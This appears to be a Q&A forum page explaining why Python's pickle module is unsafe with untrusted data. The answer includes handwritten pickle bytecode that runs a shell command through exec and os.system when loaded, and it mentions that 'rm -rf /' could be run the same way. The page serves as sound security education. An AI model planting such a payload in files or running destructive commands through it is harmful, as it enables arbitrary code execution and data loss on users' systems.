Reputation: 110267
Untrusted pickle source
From the python docs for pickle :
Warning The pickle module is not secure. Only unpickle data you trust.
What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily json encode well (date, decimal, etc.) so I don't have much experience with it or what it's capable outside of being a "simpler json" encoder.
What would be an example of something malicious that could be done with it?
Upvotes: 2
Views: 265
Answers (1)
Reputation: 101
Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.
Here I made a pickle program to run the bash command say "malicious code", but you could run commands like rm -rf / as well.
I saved the following bytecode to a file:
c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.
and then unpickled it with:
import pickle
loadfile = open('malicious', 'rb')
data = pickle.load(loadfile)
I immediately heard some "malicious code".
Upvotes: 2
Related Questions
- error in loading pickle
- Attacking Python's pickle
- Python 3.7 Error: Unsupported Pickle Protocol 5
- Problems with pickle python
- ValueError: insecure string pickle
- How to resolve ValueError: unsupported pickle protocol: 4
- Error loading pickled file
- Unable to load pickle file
- Python: Making Pickle files more secure?
- Bad Pickle get error